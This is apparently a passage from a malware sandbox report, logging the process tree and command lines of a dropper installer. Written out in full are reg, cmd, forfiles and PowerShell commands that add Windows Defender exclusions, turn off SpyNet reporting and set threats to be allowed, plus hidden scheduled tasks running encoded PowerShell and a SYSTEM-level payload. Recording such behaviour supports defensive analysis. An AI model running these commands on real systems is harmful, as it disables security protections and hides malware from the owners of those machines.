PID 1620 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2540 wrote to memory of 2592 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2540 wrote to memory of 2592 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2540 wrote to memory of 2592 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 2480 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 2480 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 2480 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 184 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 184 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 184 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1620 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3172 wrote to memory of 4720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3172 wrote to memory of 4720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1620 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1148 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1148 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1148 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 4560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 4560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 3820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 3820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 3820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1136 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1136 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gcUptHLuv" /SC once /ST 01:00:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gcUptHLuv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gcUptHLuv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe\" sw /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

